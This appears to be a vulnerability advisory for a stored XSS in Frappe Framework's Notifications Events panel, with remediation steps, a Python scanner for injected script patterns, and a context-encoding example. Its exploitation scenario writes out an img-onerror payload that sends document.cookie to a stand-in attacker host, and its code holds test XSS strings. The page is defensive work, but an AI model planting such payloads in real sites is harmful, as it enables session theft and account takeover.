CVE-2026-50709: Frappe Framework: Stored XSS in Notifications Events panel
Status: Awaiting NVD
A stored cross-site scripting vulnerability in Frappe Framework 17.0.0-dev allows any attacker with write access to the Notifications Events panel to persist malicious JavaScript that executes silently in every authenticated user's browser session, including administrators. While Frappe is not an AI-native framework, it underpins AI-enabled business applications—ERPNext deployments, custom LLM workflow tools, and ML dashboards—where a compromised admin session cascades to AI service API keys, training data credentials, and pipeline configuration access. No public exploit code, no CISA KEV listing, and absent EPSS data indicate limited near-term mass exploitation risk, but the trivially low attack bar (standard XSS toolkit, no AI/ML knowledge required) and persistent nature of the payload justify prompt remediation. Patch to a post-17.0.0-dev release when available, restrict Notifications panel write access to trusted administrators via Frappe RBAC, enforce a strict Content-Security-Policy header at the reverse proxy, and audit notification event fields for injected script patterns.
What is the risk?
Medium overall risk. Exploitation requires attacker write-access to the Frappe notifications configuration, limiting opportunistic mass exploitation. However, once injected the payload executes persistently for all authenticated users with zero further attacker interaction—a high-value persistence primitive. The affected version is a development release (17.0.0-dev), which constrains production exposure in conservative environments, but organizations running bleeding-edge Frappe in staging, demo, or early-production deployments carrying AI service credentials face meaningful lateral-movement risk if an administrator session is harvested.
What should I do?
5 steps:
1. Patch: Upgrade Frappe Framework beyond 17.0.0-dev once an official fix is released; track github.com/frappe/frappe for the remediation commit targeting CWE-79 in the Notifications Events panel.
2. Access restriction: Immediately restrict write permissions to the Notifications Events panel to a minimal set of trusted administrators using Frappe's role-based access control; remove the permission from all non-admin roles.
3. Content Security Policy: Enforce script-src 'self' and object-src 'none' at the Caddy or nginx reverse proxy level to contain the XSS blast radius even if a payload reaches the database.
4. Detection: Query the Frappe database for notification event name or description fields containing '<script', 'onerror=', 'javascript:', 'eval(', or base64-encoded payloads; alert on anomalous outbound HTTP requests originating from authenticated browser sessions.
5. Credential rotation: If exploitation is suspected, immediately rotate all API keys, session secrets, and AI service credentials accessible through the Frappe instance.
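The detection step above can be scripted as a field audit. The following is an added example written for this page, not code from Frappe or from the advisory author: it applies the indicator strings listed in the detection step (plus a base64 check that only fires when a run decodes to markup) to notification event rows represented as plain dicts. The rows in SAMPLE_EVENTS are constructed for illustration; in a real audit you would load the name and description fields of the relevant DocType from the Frappe database (for example with frappe.get_all, whose exact DocType name is not stated on this page and is left to the reader).

```python
import base64
import re

# Indicator patterns named in the advisory's detection step. These are triage
# heuristics for a stored-XSS audit, not an HTML parser: expect some false positives
# and review every hit by hand.
SCRIPT_PATTERNS = {
    "script_tag": re.compile(r"<\s*script\b", re.I),
    "event_handler": re.compile(r"\bon[a-z]+\s*=", re.I),   # onerror=, onload=, ...
    "javascript_uri": re.compile(r"javascript\s*:", re.I),
    "eval_call": re.compile(r"\beval\s*\(", re.I),
}

# A run that looks like base64; it is only flagged if it decodes to markup.
BASE64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def base64_hides_markup(text):
    """True if any base64-looking run in text decodes to something containing markup."""
    for match in BASE64_RUN.finditer(text):
        try:
            decoded = base64.b64decode(match.group(0), validate=True).decode("utf-8", "ignore")
        except ValueError:          # binascii.Error is a ValueError: not real base64
            continue
        if "<" in decoded or "script" in decoded.lower():
            return True
    return False


def scan_field(value):
    """Return the names of every indicator that fires on one field value."""
    hits = [name for name, pattern in SCRIPT_PATTERNS.items() if pattern.search(value)]
    if base64_hides_markup(value):
        hits.append("base64_markup")
    return hits


def scan_events(events):
    """Audit the name and description of each notification event row (plain dicts)."""
    findings = []
    for event in events:
        for field in ("name", "description"):
            hits = scan_field(event.get(field) or "")
            if hits:
                findings.append({"event": event["name"], "field": field, "indicators": hits})
    return findings


# Constructed sample rows standing in for records read from the Frappe database.
SAMPLE_EVENTS = [
    {"name": "Invoice Submitted", "description": "Notify accounts when an invoice is submitted."},
    {"name": "Weekly Digest", "description": "<img src=x onerror=alert(document.domain)>"},
    {"name": "Sync Status", "description": 'Open the <a href="javascript:void(0)">dashboard</a>'},
    {"name": "Model Retrained",
     "description": "payload=" + base64.b64encode(b"<script>alert(1)</script>").decode()},
]

if __name__ == "__main__":
    for finding in scan_events(SAMPLE_EVENTS):
        print(finding)
```

Run it periodically (or on every save of the affected DocType) and route findings to the same channel as the outbound-request alerting in the detection step; a hit on a record that legitimate administrators did not author is the signal to start the credential-rotation step.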
Frequently Asked Questions
Is CVE-2026-50709 actively exploited?
No confirmed active exploitation of CVE-2026-50709 has been reported, but organizations should still patch proactively.
What systems are affected by CVE-2026-50709?
This vulnerability affects the following AI/ML architecture patterns: Web-based AI interfaces, ML UI dashboards, Business application AI integrations, Frappe-backed agent workflow UIs, ERP systems with AI-augmented analytics.
What is the CVSS score for CVE-2026-50709?
No CVSS score has been assigned yet.
What is the AI security impact?
MITRE ATLAS Techniques
- AML.T0025 Exfiltration via Cyber Means
- AML.T0049 Exploit Public-Facing Application
- AML.T0055 Unsecured Credentials
What are the technical details?
Original Advisory
A Stored Cross-Site Scripting (XSS) vulnerability exists in Frappe Framework version 17.0.0-dev due to improper neutralization of user-controlled input in the Notifications > Events panel.
Exploitation Scenario
An adversary with low-privileged write access to a Frappe instance—obtained via a compromised support account, a misconfigured demo environment, or an insider—navigates to the Notifications Events panel and inserts a stored XSS payload into an event name or description field. The payload, for example an <img src=x onerror='fetch("https://attacker.io/exfil?c="+document.cookie)'> tag, is stored in the Frappe database without sanitization. Any authenticated user who subsequently views the Events panel—including system administrators—receives the malicious script and involuntarily beacons their session token to the attacker. In an AI/ML deployment context, the attacker reuses the harvested admin session to access Frappe system settings containing LLM provider API keys, reconfigure AI webhook endpoints to attacker-controlled URLs, or export dataset records processed by AI-augmented workflows—all without triggering further authentication challenges.
Weaknesses (CWE)
CWE-79 — Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'): The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
- [Architecture and Design] Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482]. Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.
- [Implementation, Architecture and Design] Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies. For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters. Parts of the same output document may require different encodings, which will vary depending on whether the output is in the HTML body, element attributes (such as src="XYZ"), URIs, JavaScript sections, or Cascading Style Sheets and style properties. Note that HTML Entity Encoding is only appropriate for the HTML body. Consult the XSS Prevention Cheat Sheet [REF-724] for more details on the types of encoding and escaping that are needed.
Source: MITRE CWE corpus.
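The CWE mitigation above (encode for the context the data lands in) is what the Notifications Events panel would need to apply to event names and descriptions. The block below is an added example written for this page, not Frappe's own rendering code: it shows four context-specific encoders from the Python standard library and a render_event_row function (a hypothetical name) that uses each one in the right place, so that the img/onerror payload quoted in the exploitation scenario above and a javascript: link are rendered as inert text. The event dict shape is an assumption made for the example.

```python
import html
import json
import re
from urllib.parse import urlsplit

# Tabs, newlines and other control characters are sometimes used to disguise a
# URL scheme (e.g. "java\tscript:"); strip them before inspecting the scheme.
_CONTROL_CHARS = re.compile(r"[\x00-\x20]")


def for_html_body(value):
    # HTML entity encoding is appropriate only for text inside the HTML body.
    return html.escape(value, quote=False)


def for_attribute(value):
    # Quoted attribute values additionally need the quote characters encoded.
    return html.escape(value, quote=True)


def for_url_attribute(value):
    # href/src: allow only http(s) or relative URLs, then attribute-encode the result.
    cleaned = _CONTROL_CHARS.sub("", value)
    if urlsplit(cleaned).scheme not in ("", "http", "https"):
        return "#"
    return html.escape(cleaned, quote=True)


def for_javascript(value):
    # Inside a <script> block, JSON-encode the value and escape the characters
    # that could otherwise close the tag or start markup.
    return (json.dumps(value)
            .replace("<", "\\u003c")
            .replace(">", "\\u003e")
            .replace("&", "\\u0026"))


def render_event_row(event):
    """Render one notification event with each field encoded for its output context."""
    return (
        '<tr><td>{name}</td><td>{desc}</td>'
        '<td><a href="{link}" title="{title}">open</a></td></tr>'
        '<script>window.lastEvent = {js};</script>'
    ).format(
        name=for_html_body(event["name"]),
        desc=for_html_body(event["description"]),
        link=for_url_attribute(event["link"]),
        title=for_attribute(event["name"]),
        js=for_javascript(event["name"]),
    )


if __name__ == "__main__":
    # Constructed sample record carrying the kinds of payloads the advisory describes.
    sample = {
        "name": 'Digest "v2"',
        "description": "<img src=x onerror=alert(1)>",
        "link": "javascript:alert(1)",
    }
    print(render_event_row(sample))
```

The point the CWE text makes is visible in the four functions: the same string needs a different transformation depending on whether it lands in the body, an attribute, a URL or a script block, and a single generic escape would be wrong for at least one of them.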
Related Vulnerabilities
- CVE-2026-21858 (10.0) n8n: Input Validation flaw enables exploitation. Same attack type: Data Extraction
- CVE-2025-2828 (10.0) LangChain RequestsToolkit: SSRF exposes cloud metadata. Same attack type: Data Extraction
- CVE-2025-53767 (10.0) Azure OpenAI: SSRF EoP, no auth required (CVSS 10). Same attack type: Data Extraction
- CVE-2023-3765 (10.0) MLflow: path traversal allows arbitrary file read. Same attack type: Data Extraction
- GHSA-vvpj-8cmc-gx39 (10.0) picklescan: security flaw enables exploitation. Same attack type: Auth Bypass